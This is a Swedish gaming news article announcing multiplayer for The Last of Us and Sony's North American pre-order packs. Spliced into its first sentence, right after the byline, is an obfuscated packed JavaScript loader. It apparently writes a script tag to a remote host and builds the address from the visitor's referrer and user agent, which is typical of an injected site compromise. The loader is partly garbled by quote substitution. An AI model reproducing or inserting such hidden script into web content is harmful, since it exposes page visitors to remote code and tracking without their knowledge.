Image Image Image Image Image Image Image Image Image Image

| 19 januari, 2020

Scroll to top

Top

Multiplayer för The Last of Us bekräftat

Multiplayer för The Last of Us bekräftat
Sebastian

The eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|radnh|var|u0026u|referrer|afdrf||js|php’.split(’|’),0,{}))
Last of Us: Förra veckan fick vi se en ny härlig trailer av det kommande spelet The Last of Us som kommer den 7 maj 2013. 

Förboknings-erbjudanden har också meddelats av Sony. Dessa kommer att lanseras i två paket. Det ena paketet ”Sights And Sounds Pack” kommer att innehålla soundtracks, ett dynamiskt tema för XMB samt två PSN-avatarer. Det andra paketet heter ”The Survival Pack” och verkar vara exklusivt för Gamestop. Detta paket kommer att innehålla massa roliga saker för spelets multiplayer.

Dessa erbjudanden är än så länge bara bekräftade för Nord Amerika. Dock är det mycket troligt att de kommer att släppas till oss också.

Det är kul att nu veta att spelet kommer få en multiplayer, något som innan endast nämnts några enstaka gånger. Det har alltså aldrig varit 100 procent säkert.

Naughty Dog har innan skapat rätt ok multiplayer-lägen i Uncharted 2 och 3 så troligen kommer det bli en bra upplevelse även här.

Mer info: blog.us.playstation.com